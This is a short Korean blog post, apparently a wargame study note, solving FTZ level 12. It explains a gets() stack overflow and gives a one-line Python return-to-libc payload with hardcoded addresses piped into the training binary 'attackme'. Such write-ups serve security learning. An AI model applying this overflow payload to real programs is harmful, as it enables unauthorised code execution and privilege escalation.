본문 바로가기

Pwnable/▷ Study

ftz level12

level11이랑 거의 똑같다.

이번엔 level11처럼 argv로 입력받는 방식이 아닌 gets로 입력받는다.

gets에서 버퍼오버플로우가 터지므로 level11과 비슷하게 익스 짜주면 된다.

해당 문제도 마찬가지로 str[256]  + dummy[8] + sfp[4] + ret[4] 로 구성되어 있으므로 

(python -c 'print "A"*268 + "\xc0\xf2\x03\x42" + "AAAA" + "\xa4\x7e\x12\x42"';cat) | ./attackme

마찬가지로 ASLR 기법이 걸려있으므로 RTL 기법으로 문제를 풀었다.

'Pwnable > ▷ Study' 카테고리의 다른 글

ftz level16  (0) 2018.02.17
ftz level15  (0) 2018.02.17
ftz level14  (0) 2018.02.17
ftz level13  (0) 2018.02.17
ftz level11  (0) 2018.02.17